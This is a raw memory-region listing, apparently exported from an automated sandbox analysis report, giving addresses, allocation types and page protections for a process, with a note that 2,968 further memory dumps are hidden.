trusted library allocation
page read and write
88A0000
unkown
page read and write
9630000
trusted library allocation
page read and write
95D0000
trusted library allocation
page read and write
9A10000
trusted library allocation
page read and write
95E0000
trusted library allocation
page read and write
97B0000
trusted library allocation
page read and write
9AE0000
trusted library allocation
page read and write
9960000
trusted library allocation
page read and write
9960000
trusted library allocation
page read and write
95D0000
trusted library allocation
page read and write
28AA000
heap
page read and write
9940000
trusted library allocation
page read and write
3600000
heap
page read and write
7A20000
trusted library allocation
page read and write
9A10000
trusted library allocation
page read and write
4D10000
heap
page read and write
9740000
trusted library allocation
page read and write
187C7227000
heap
page read and write
4CDC000
heap
page read and write
5B0D000
trusted library allocation
page read and write
97C5000
trusted library allocation
page read and write
9810000
trusted library allocation
page read and write
4DDE000
stack
page read and write
9900000
trusted library allocation
page read and write
88D0000
trusted library allocation
page read and write
6CD2F7F000
stack
page read and write
E45FD7E000
stack
page read and write
9930000
trusted library allocation
page read and write
B3F4000
trusted library allocation
page read and write
4D50000
heap
page read and write
9B40000
trusted library allocation
page read and write
2056A600000
trusted library allocation
page read and write
E45FEFE000
stack
page read and write
9640000
trusted library allocation
page read and write
8B0000
heap
page read and write
8760000
trusted library allocation
page read and write
B3FB000
trusted library allocation
page read and write
9BB0000
trusted library allocation
page read and write
9810000
trusted library allocation
page read and write
87A0000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
1B0000
remote allocation
page read and write
9910000
trusted library allocation
page read and write
2056A790000
trusted library allocation
page read and write
9650000
trusted library allocation
page read and write
9AF0000
trusted library allocation
page read and write
9730000
trusted library allocation
page read and write
97C0000
trusted library allocation
page read and write
CA2DCFF000
stack
page read and write
8870000
trusted library allocation
page read and write
87A0000
trusted library allocation
page read and write
8750000
trusted library allocation
page read and write
8850000
trusted library allocation
page read and write
9BD0000
trusted library allocation
page read and write
99E0000
trusted library allocation
page read and write
96F0000
trusted library allocation
page read and write
95E0000
trusted library allocation
page read and write
88C5000
trusted library allocation
page read and write
9A50000
unkown
page read and write
804F000
stack
page read and write
4D48000
heap
page read and write
88D5000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
7740000
trusted library allocation
page read and write
88A0000
unkown
page read and write
95F0000
trusted library allocation
page read and write
6CD28FE000
stack
page read and write
88D0000
unkown
page read and write
97E0000
trusted library allocation
page read and write
88C0000
trusted library allocation
page read and write
4C80000
heap
page read and write
9B50000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
B600000
trusted library allocation
page read and write
187C7302000
heap
page read and write
23F0000
heap
page read and write
95D0000
trusted library allocation
page read and write
2056A8E4000
heap
page read and write
87A0000
trusted library allocation
page read and write
88D0000
trusted library allocation
page read and write
9830000
trusted library allocation
page read and write
50CE000
stack
page read and write
88A0000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
20566270000
trusted library section
page readonly
6C80000
direct allocation
page read and write
9640000
trusted library allocation
page read and write
9640000
trusted library allocation
page read and write
88A0000
trusted library allocation
page read and write
97B0000
trusted library allocation
page read and write
5240000
heap
page read and write
27F9000
heap
page read and write
9470000
trusted library allocation
page read and write
9940000
trusted library allocation
page read and write
88B0000
trusted library allocation
page read and write
2B0A000
unkown
page read and write
71B0000
heap
page read and write
2BBF000
stack
page read and write
9810000
trusted library allocation
page read and write
95E0000
trusted library allocation
page read and write
53A1000
heap
page read and write
A30000
remote allocation
page read and write
9A20000
trusted library allocation
page read and write
4D4C000
heap
page read and write
2138FCEC000
heap
page read and write
465E000
trusted library allocation
page read and write
363B000
heap
page read and write
9720000
trusted library allocation
page execute and read and write
4656000
trusted library allocation
page read and write
5440000
trusted library allocation
page readonly
22E0000
heap
page read and write
99C0000
trusted library allocation
page read and write
2056506A000
heap
page read and write
4D4B000
heap
page read and write
5D72000
trusted library allocation
page read and write
9490000
trusted library allocation
page read and write
97C0000
trusted library allocation
page read and write
9715000
trusted library allocation
page read and write
9730000
trusted library allocation
page read and write
88A0000
unkown
page read and write
187C7160000
heap
page read and write
9A40000
trusted library allocation
page read and write
7680000
trusted library allocation
page read and write
7530000
trusted library allocation
page read and write
8740000
trusted library allocation
page execute and read and write
9620000
trusted library allocation
page read and write
9AC0000
trusted library allocation
page read and write
9637000
trusted library allocation
page read and write
95D0000
trusted library allocation
page read and write
9470000
trusted library allocation
page read and write
1AFA642D000
heap
page read and write
9600000
trusted library allocation
page read and write
1C909FB000
stack
page read and write
9780000
trusted library allocation
page read and write
9660000
trusted library allocation
page read and write
9715000
trusted library allocation
page read and write
A5E0000
trusted library allocation
page read and write
95D0000
trusted library allocation
page read and write
9BB0000
trusted library allocation
page read and write
D68DAFB000
stack
page read and write
97B0000
trusted library allocation
page read and write
7620000
trusted library allocation
page execute and read and write
95E0000
trusted library allocation
page read and write
9840000
trusted library allocation
page read and write
9820000
trusted library allocation
page read and write
8870000
trusted library allocation
page read and write
95D0000
trusted library allocation
page read and write
9C30000
trusted library allocation
page read and write
9710000
trusted library allocation
page read and write
9950000
trusted library allocation
page execute and read and write
8750000
trusted library allocation
page read and write
9470000
trusted library allocation
page read and write
95E0000
trusted library allocation
page read and write
98F0000
trusted library allocation
page read and write
95E0000
trusted library allocation
page read and write
7910000
trusted library allocation
page read and write
99B0000
trusted library allocation
page read and write
97B0000
trusted library allocation
page read and write
88C0000
trusted library allocation
page read and write
808D000
stack
page read and write
2056AA00000
trusted library allocation
page read and write
5360000
trusted library allocation
page read and write
9640000
trusted library allocation
page read and write
97C0000
trusted library allocation
page read and write
223A2210000
heap
page read and write
9770000
trusted library allocation
page read and write
87A0000
trusted library allocation
page read and write
BCDD000
trusted library allocation
page read and write
9BE0000
trusted library allocation
page read and write
9870000
trusted library allocation
page read and write
22C0000
direct allocation
page execute and read and write
87A7000
trusted library allocation
page read and write
9A10000
trusted library allocation
page read and write
97E0000
trusted library allocation
page read and write
19C000
stack
page read and write
BB20000
trusted library allocation
page read and write
8730000
trusted library allocation
page read and write
88C0000
trusted library allocation
page read and write
9816000
trusted library allocation
page read and write
95EA000
trusted library allocation
page read and write
2D3AB500000
heap
page read and write
9820000
trusted library allocation
page read and write
9816000
trusted library allocation
page read and write
76F0000
trusted library allocation
page read and write
9640000
trusted library allocation
page read and write
870000
trusted library allocation
page read and write
B425000
trusted library allocation
page read and write
9960000
trusted library allocation
page read and write
88C0000
trusted library allocation
page read and write
98F0000
trusted library allocation
page read and write
9B60000
trusted library allocation
page read and write
95D0000
trusted library allocation
page read and write
9B60000
trusted library allocation
page read and write
CA2DB7F000
stack
page read and write
9960000
trusted library allocation
page execute and read and write
9830000
trusted library allocation
page read and write
BB38000
trusted library allocation
page read and write
9760000
trusted library allocation
page read and write
537D000
trusted library allocation
page execute and read and write
860000
remote allocation
page read and write
9740000
trusted library allocation
page read and write
74E0000
trusted library allocation
page read and write
53EE000
heap
page read and write
BBAE000
trusted library allocation
page read and write
5280000
heap
page read and write
9A30000
trusted library allocation
page read and write
9600000
trusted library allocation
page read and write
9850000
trusted library allocation
page read and write
9BE0000
trusted library allocation
page read and write
9960000
trusted library allocation
page read and write
8880000
trusted library allocation
page read and write
BC4D000
trusted library allocation
page read and write
97C0000
trusted library allocation
page read and write
A5D0000
trusted library allocation
page read and write
2D3AB464000
heap
page read and write
9840000
trusted library allocation
page read and write
33C8000
heap
page read and write
77E0000
trusted library allocation
page read and write
2056503F000
heap
page read and write
9907000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
9630000
trusted library allocation
page read and write
97C0000
trusted library allocation
page read and write
A5D0000
trusted library allocation
page read and write
9470000
unkown
page read and write
BB73000
trusted library allocation
page read and write
7A20000
trusted library allocation
page read and write
BAAB000
trusted library allocation
page read and write
88A0000
trusted library allocation
page read and write
7854000
trusted library allocation
page read and write
9620000
trusted library allocation
page read and write
9880000
trusted library allocation
page read and write
9810000
trusted library allocation
page read and write
9710000
trusted library allocation
page read and write
95E0000
trusted library allocation
page read and write
6A70000
direct allocation
page read and write
88A0000
trusted library allocation
page read and write
88D0000
trusted library allocation
page read and write
831B000
trusted library allocation
page read and write
34F0000
unkown
page read and write
9850000
trusted library allocation
page read and write
4CDA000
heap
page read and write
51FA000
stack
page read and write
9710000
trusted library allocation
page read and write
8870000
trusted library allocation
page read and write
2138FCEE000
heap
page read and write
95E0000
trusted library allocation
page read and write
2DCE000
unkown
page read and write
A5E0000
trusted library allocation
page read and write
9810000
trusted library allocation
page read and write
98D0000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
9BE0000
trusted library allocation
page read and write
9960000
trusted library allocation
page read and write
88A0000
unkown
page read and write
9740000
trusted library allocation
page read and write
9810000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
BDD8000
trusted library allocation
page read and write
9830000
trusted library allocation
page read and write
9B80000
trusted library allocation
page read and write
834E000
trusted library allocation
page read and write
6C72000
direct allocation
page read and write
9710000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
9A58000
trusted library allocation
page read and write
4840000
heap
page read and write
9710000
trusted library allocation
page read and write
9710000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
E45FC7B000
stack
page read and write
88D0000
trusted library allocation
page read and write
9BE0000
trusted library allocation
page read and write
9655000
trusted library allocation
page read and write
174FA508000
heap
page read and write
D289000
stack
page read and write
8880000
trusted library allocation
page read and write
4D49000
heap
page read and write
9B50000
trusted library allocation
page read and write
88C0000
trusted library allocation
page read and write
CA2D7FF000
stack
page read and write
99B0000
trusted library allocation
page read and write
44FF000
stack
page read and write
8830000
trusted library allocation
page read and write
2B4E000
unkown
page read and write
9960000
trusted library allocation
page read and write
8860000
trusted library allocation
page read and write
6ED000
stack
page read and write
2D3AB513000
heap
page read and write
88A0000
trusted library allocation
page read and write
9630000
trusted library allocation
page read and write
9C50000
trusted library allocation
page read and write
205665E0000
trusted library allocation
page read and write
4D97000
heap
page read and write
9980000
trusted library allocation
page read and write
9640000
trusted library allocation
page read and write
3E1E000
unkown
page read and write
9960000
trusted library allocation
page read and write
88A0000
trusted library allocation
page read and write
847D000
direct allocation
page read and write
95D0000
trusted library allocation
page read and write
9640000
unkown
page read and write
8840000
trusted library allocation
page read and write
B408000
trusted library allocation
page read and write
9A80000
unkown
page read and write
97C0000
trusted library allocation
page read and write
174FAC02000
trusted library allocation
page read and write
5A20000
trusted library allocation
page read and write
4D3A000
heap
page read and write
4DCE000
stack
page read and write
88C0000
unkown
page read and write
87A0000
trusted library allocation
page read and write
3FE1000
unkown
page read and write
873C000
trusted library allocation
page read and write
9630000
unkown
page read and write
9810000
trusted library allocation
page read and write
87A0000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
A5D0000
trusted library allocation
page read and write
53FE000
stack
page read and write
9B20000
unkown
page read and write
97C0000
trusted library allocation
page read and write
42B0000
trusted library allocation
page read and write
BBB6000
trusted library allocation
page read and write
223A2502000
heap
page read and write
9600000
trusted library allocation
page read and write
282C000
direct allocation
page read and write
87A0000
unkown
page read and write
758C000
stack
page read and write
7E7F000
stack
page read and write
A5F0000
trusted library allocation
page read and write
400000
unkown
page readonly
9783000
trusted library allocation
page read and write
95FC000
trusted library allocation
page read and write
5BD2000
trusted library allocation
page read and write
A5E0000
trusted library allocation
page read and write
9730000
trusted library allocation
page read and write
50590000
unkown
page readonly
8740000
trusted library allocation
page read and write
9BE0000
trusted library allocation
page read and write
27B5DE00000
heap
page read and write
76C0000
trusted library allocation
page read and write
5E24000
trusted library allocation
page read and write
4D8E000
stack
page read and write
9B50000
trusted library allocation
page read and write
B3FF000
trusted library allocation
page read and write
A5E0000
trusted library section
page read and write
9475000
trusted library allocation
page read and write
A640000
trusted library allocation
page read and write
2D3AB1A0000
heap
page read and write
74B8000
trusted library allocation
page read and write
95D0000
trusted library allocation
page read and write
7950000
trusted library allocation
page read and write
9715000
trusted library allocation
page read and write
9A00000
trusted library allocation
page read and write
9960000
trusted library allocation
page read and write
97C0000
trusted library allocation
page read and write
9A10000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
187C7313000
heap
page read and write
223A243D000
heap
page read and write
8880000
trusted library allocation
page read and write
97C0000
trusted library allocation
page read and write
9600000
trusted library allocation
page read and write
99F0000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
9830000
trusted library allocation
page read and write
5390000
trusted library allocation
page read and write
97A7000
trusted library allocation
page read and write
9BA6000
trusted library allocation
page read and write
9650000
trusted library allocation
page read and write
2F8A000
heap
page read and write
B459000
trusted library allocation
page read and write
9840000
trusted library allocation
page read and write
5A28000
trusted library allocation
page read and write
88A0000
trusted library allocation
page read and write
400000
unkown
page readonly
9658000
trusted library allocation
page read and write
7530000
trusted library allocation
page read and write
223A2200000
heap
page read and write
22B0000
trusted library allocation
page read and write
9630000
trusted library allocation
page read and write
2138FE19000
heap
page read and write
9470000
unkown
page read and write
1AFA6413000
heap
page read and write
87A5000
trusted library allocation
page read and write
7690000
trusted library allocation
page read and write
9BC0000
trusted library allocation
page execute and read and write
5110000
heap
page read and write
88A0000
unkown
page read and write
54EA000
trusted library allocation
page read and write
9B40000
trusted library allocation
page read and write
A5D0000
trusted library allocation
page read and write
9730000
trusted library allocation
page read and write
2D3ABC02000
trusted library allocation
page read and write
6BA2000
direct allocation
page read and write
4D1B000
heap
page read and write
4683000
trusted library allocation
page read and write
8838000
trusted library allocation
page read and write
9960000
trusted library allocation
page read and write
B6C0000
trusted library allocation
page read and write
43FD000
stack
page read and write
629B6FE000
stack
page read and write
9470000
trusted library allocation
page read and write
6D3000
heap
page read and write
8470000
direct allocation
page read and write
43B4000
heap
page read and write
95E0000
trusted library allocation
page read and write
51F2000
direct allocation
page read and write
7830000
trusted library allocation
page read and write
6CD25F8000
stack
page read and write
9C20000
trusted library allocation
page read and write
8730000
trusted library allocation
page read and write
9470000
trusted library allocation
page read and write
9844000
trusted library allocation
page read and write
9600000
trusted library allocation
page read and write
9A00000
trusted library allocation
page read and write
9940000
trusted library allocation
page read and write
99B8000
trusted library allocation
page read and write
549D000
stack
page read and write
9960000
trusted library allocation
page read and write
87A0000
unkown
page read and write
1AFA6360000
trusted library allocation
page read and write
9A50000
trusted library allocation
page read and write
87A0000
trusted library allocation
page read and write
3F5D000
unkown
page read and write
9BE0000
trusted library allocation
page read and write
883E000
trusted library allocation
page read and write
9840000
trusted library allocation
page read and write
4D84000
heap
page read and write
83C000
stack
page read and write
9630000
trusted library allocation
page read and write
88A0000
trusted library allocation
page read and write
87A6000
trusted library allocation
page read and write
9480000
trusted library allocation
page read and write
97C0000
trusted library allocation
page read and write
98F0000
trusted library allocation
page read and write
8370000
trusted library allocation
page read and write
B861000
trusted library allocation
page read and write
99F0000
trusted library allocation
page execute and read and write
9BE0000
trusted library allocation
page read and write
2056AA24000
trusted library allocation
page read and write
95F0000
trusted library allocation
page read and write
47F0000
heap
page read and write
4DA5000
heap
page read and write
2D3AB468000
heap
page read and write
43EC000
stack
page read and write
9740000
trusted library allocation
page read and write
223A2513000
heap
page read and write
9BA0000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
95F0000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
A5D0000
trusted library allocation
page read and write
9620000
trusted library allocation
page read and write
8880000
trusted library allocation
page read and write
2306000
direct allocation
page read and write
9B90000
trusted library allocation
page read and write
8720000
trusted library allocation
page read and write
44BD000
stack
page read and write
88C0000
trusted library allocation
page read and write
4D13000
heap
page read and write
94E000
stack
page read and write
B412000
trusted library allocation
page read and write
96F0000
unkown
page read and write
9490000
trusted library allocation
page read and write
95D0000
trusted library allocation
page read and write
9730000
trusted library allocation
page read and write
9649000
trusted library allocation
page read and write
9840000
trusted library allocation
page read and write
9610000
trusted library allocation
page read and write
A6FE000
stack
page read and write
9630000
trusted library allocation
page read and write
63B20FE000
stack
page read and write
33C7000
heap
page read and write
A5E0000
trusted library allocation
page read and write
97C0000
trusted library allocation
page read and write
9470000
trusted library allocation
page read and write
9710000
trusted library allocation
page read and write
9BD0000
trusted library allocation
page read and write
9815000
trusted library allocation
page read and write
8870000
trusted library allocation
page read and write
9710000
trusted library allocation
page read and write
A5D5000
trusted library allocation
page read and write
8710000
trusted library allocation
page read and write
9490000
trusted library allocation
page read and write
95D0000
trusted library allocation
page read and write
88C0000
trusted library allocation
page read and write
6CD2D7E000
stack
page read and write
2ECF000
unkown
page read and write
9A47000
trusted library allocation
page read and write
174FA44B000
heap
page read and write
4DA5000
heap
page read and write
9960000
trusted library allocation
page read and write
9710000
trusted library allocation
page read and write
87A5000
trusted library allocation
page read and write
87A0000
unkown
page read and write
87A0000
trusted library allocation
page read and write
97B0000
trusted library allocation
page read and write
A5D0000
trusted library allocation
page read and write
4CB8000
heap
page read and write
9760000
trusted library allocation
page read and write
2862000
heap
page read and write
9760000
trusted library allocation
page read and write
B6F1000
trusted library allocation
page read and write
2056508D000
heap
page read and write
9A50000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
9810000
trusted library allocation
page read and write
223A2413000
heap
page read and write
1AFA6429000
heap
page read and write
88C0000
trusted library allocation
page read and write
5BB5000
trusted library allocation
page read and write
8840000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
9630000
trusted library allocation
page read and write
8290000
trusted library allocation
page read and write
4BB0000
heap
page read and write
3D0000
trusted library allocation
page read and write
9BD0000
trusted library allocation
page read and write
5ADC000
trusted library allocation
page read and write
95F0000
trusted library allocation
page read and write
9B50000
trusted library allocation
page read and write
629B87E000
stack
page read and write
20565102000
heap
page read and write
BCAA000
trusted library allocation
page read and write
98F0000
trusted library allocation
page read and write
9BE0000
trusted library allocation
page read and write
9742000
trusted library allocation
page read and write
5370000
heap
page read and write
9640000
trusted library allocation
page read and write
9B50000
trusted library allocation
page read and write
9770000
trusted library allocation
page read and write
4656000
trusted library allocation
page read and write
9C70000
trusted library allocation
page read and write
98D0000
trusted library allocation
page read and write
9810000
trusted library allocation
page read and write
174FA429000
heap
page read and write
98D0000
trusted library allocation
page read and write
7709000
trusted library allocation
page read and write
7790000
trusted library allocation
page read and write
2056506C000
heap
page read and write
9470000
trusted library allocation
page read and write
9600000
trusted library allocation
page read and write
9635000
trusted library allocation
page read and write
87A0000
trusted library allocation
page read and write
77C0000
trusted library allocation
page read and write
9630000
trusted library allocation
page read and write
27B5DE57000
heap
page read and write
5781000
trusted library allocation
page read and write
9950000
trusted library allocation
page read and write
96F0000
trusted library allocation
page read and write
8710000
trusted library allocation
page read and write
95D0000
trusted library allocation
page read and write
9BE0000
trusted library allocation
page read and write
9490000
trusted library allocation
page read and write
8720000
trusted library allocation
page execute and read and write
9600000
trusted library allocation
page read and write
2138FE20000
trusted library allocation
page read and write
99C0000
trusted library allocation
page read and write
87A0000
trusted library allocation
page read and write
1C905BE000
stack
page read and write
9960000
trusted library allocation
page read and write
400000
unkown
page readonly
99C0000
trusted library allocation
page read and write
2FF0000
trusted library allocation
page read and write
187C7299000
heap
page read and write
8710000
trusted library allocation
page read and write
9B90000
trusted library allocation
page read and write
2138FD0C000
heap
page read and write
9BE0000
trusted library allocation
page read and write
9960000
trusted library allocation
page read and write
2138FCC6000
heap
page read and write
B5E0000
trusted library allocation
page read and write
42ED000
stack
page read and write
9810000
trusted library allocation
page read and write
9650000
trusted library allocation
page read and write
9760000
trusted library allocation
page read and write
9C56000
trusted library allocation
page read and write
9639000
trusted library allocation
page read and write
9960000
trusted library allocation
page read and write
98E000
stack
page read and write
A613000
trusted library allocation
page read and write
97C0000
trusted library allocation
page read and write
9710000
trusted library allocation
page read and write
27E0000
trusted library allocation
page read and write
2056A8F1000
heap
page read and write
9A0000
trusted library allocation
page read and write
9650000
trusted library allocation
page read and write
9640000
trusted library allocation
page read and write
A5E0000
trusted library allocation
page read and write
A9FE000
stack
page read and write
5AEC000
trusted library allocation
page read and write
9950000
trusted library allocation
page read and write
BD6B000
trusted library allocation
page read and write
9600000
trusted library allocation
page read and write
34CA000
stack
page read and write
88C0000
unkown
page read and write
A5E0000
trusted library allocation
page read and write
9960000
trusted library allocation
page read and write
9A23000
trusted library allocation
page read and write
4520000
heap
page read and write
512E000
stack
page read and write
7C3C000
stack
page read and write
9610000
trusted library allocation
page execute and read and write
2EF0000
heap
page read and write
1C90BFE000
stack
page read and write
9710000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
97C0000
trusted library allocation
page read and write
9A20000
trusted library allocation
page read and write
9770000
trusted library allocation
page read and write
99B0000
trusted library allocation
page read and write
4FAE000
stack
page read and write
A5F0000
trusted library allocation
page read and write
9BD0000
trusted library allocation
page read and write
9630000
trusted library allocation
page read and write
176CD7F000
stack
page read and write
5A8A000
trusted library allocation
page read and write
97C0000
trusted library allocation
page read and write
2056A7D0000
trusted library allocation
page read and write
9850000
trusted library allocation
page read and write
98F3000
trusted library allocation
page read and write
9810000
trusted library allocation
page read and write
99F0000
trusted library allocation
page read and write
28BD000
heap
page read and write
9A20000
trusted library allocation
page read and write
B69B000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
5D2A000
trusted library allocation
page read and write
9A50000
trusted library allocation
page read and write
9650000
unkown
page read and write
9780000
trusted library allocation
page read and write
9810000
unkown
page read and write
9870000
trusted library allocation
page read and write
9810000
trusted library allocation
page read and write
27B5DD30000
heap
page read and write
95F0000
trusted library allocation
page read and write
97C0000
trusted library allocation
page read and write
99C0000
trusted library allocation
page read and write
4651000
trusted library allocation
page read and write
9BC0000
trusted library allocation
page read and write
95F0000
trusted library allocation
page read and write
2D3AB45C000
heap
page read and write
205665C1000
trusted library allocation
page read and write
5D70000
trusted library allocation
page read and write
74B0000
trusted library allocation
page read and write
3410000
heap
page read and write
7F890000
unkown
page read and write
9835000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
9BA0000
unkown
page read and write
1AFA6513000
heap
page read and write
A610000
trusted library allocation
page read and write
3DB1000
unkown
page execute read
9710000
trusted library allocation
page read and write
64E2000
trusted library allocation
page read and write
95D0000
trusted library allocation
page read and write
2CC7000
heap
page read and write
53E7000
heap
page read and write
99AE000
stack
page read and write
9630000
trusted library allocation
page read and write
95B0000
trusted library allocation
page read and write
2056AAC0000
trusted library allocation
page read and write
7700000
trusted library allocation
page read and write
98A0000
trusted library allocation
page read and write
9630000
trusted library allocation
page read and write
95E7000
trusted library allocation
page read and write
BCB2000
trusted library allocation
page read and write
74B0000
trusted library allocation
page read and write
7700000
trusted library allocation
page read and write
4689000
trusted library allocation
page read and write
4880000
heap
page read and write
74C0000
trusted library allocation
page read and write
5DBB000
trusted library allocation
page read and write
87A0000
trusted library allocation
page read and write
87A0000
trusted library allocation
page read and write
1AFA648D000
heap
page read and write
3FC4000
unkown
page read and write
2865000
heap
page read and write
3449000
heap
page read and write
54B1000
trusted library allocation
page read and write
20565029000
heap
page read and write
4D20000
heap
page read and write
A5D9000
trusted library allocation
page read and write
9A20000
trusted library allocation
page read and write
87A0000
trusted library allocation
page read and write
46B2000
trusted library allocation
page read and write
88C0000
trusted library allocation
page read and write
223A2477000
heap
page read and write
9810000
trusted library allocation
page read and write
48F000
unkown
page write copy
A5D0000
trusted library allocation
page read and write
21390BD0000
heap
page readonly
2F35000
heap
page read and write
5B1D000
trusted library allocation
page read and write
2138FB40000
trusted library allocation
page read and write
27B5DDC0000
trusted library allocation
page read and write
88C5000
trusted library allocation
page read and write
174FA453000
heap
page read and write
79E0000
trusted library allocation
page read and write
570000
heap
page read and write
87A0000
unkown
page read and write
9940000
trusted library allocation
page read and write
8850000
trusted library allocation
page read and write
2320000
heap
page read and write
9710000
trusted library allocation
page read and write
95D0000
trusted library allocation
page read and write
A5D0000
trusted library allocation
page read and write
C6F0000
trusted library allocation
page read and write
9760000
trusted library allocation
page read and write
87A0000
trusted library allocation
page read and write
8760000
trusted library allocation
page read and write
48E000
unkown
page write copy
97C0000
trusted library allocation
page read and write
9BE0000
trusted library allocation
page read and write
9B50000
trusted library allocation
page read and write
4DA5000
heap
page read and write
9810000
trusted library allocation
page read and write
174FA44D000
heap
page read and write
87A0000
trusted library allocation
page read and write
9D80000
heap
page read and write
20566240000
trusted library section
page readonly
223A2400000
heap
page read and write
4C80000
remote allocation
page read and write
9760000
trusted library allocation
page read and write
9C50000
unkown
page read and write
7F650000
unkown
page read and write
9BF0000
unkown
page read and write
7E3E000
stack
page read and write
9840000
trusted library allocation
page read and write
9810000
trusted library allocation
page read and write
9910000
trusted library allocation
page read and write
8730000
trusted library allocation
page read and write
74B0000
trusted library allocation
page read and write
9600000
trusted library allocation
page read and write
9B50000
trusted library allocation
page read and write
9650000
trusted library allocation
page read and write
2056A7A0000
trusted library allocation
page read and write
2A5F000
stack
page read and write
87AE000
unkown
page read and write
99B0000
trusted library allocation
page read and write
A610000
trusted library allocation
page read and write
9839000
trusted library allocation
page read and write
88E0000
trusted library allocation
page execute and read and write
20566260000
trusted library section
page readonly
63B1DBB000
stack
page read and write
88D5000
trusted library allocation
page read and write
48BD000
stack
page read and write
BBF5000
trusted library allocation
page read and write
99C0000
trusted library allocation
page read and write
7A20000
trusted library allocation
page read and write
There are 2968 hidden memdumps, click here to show them.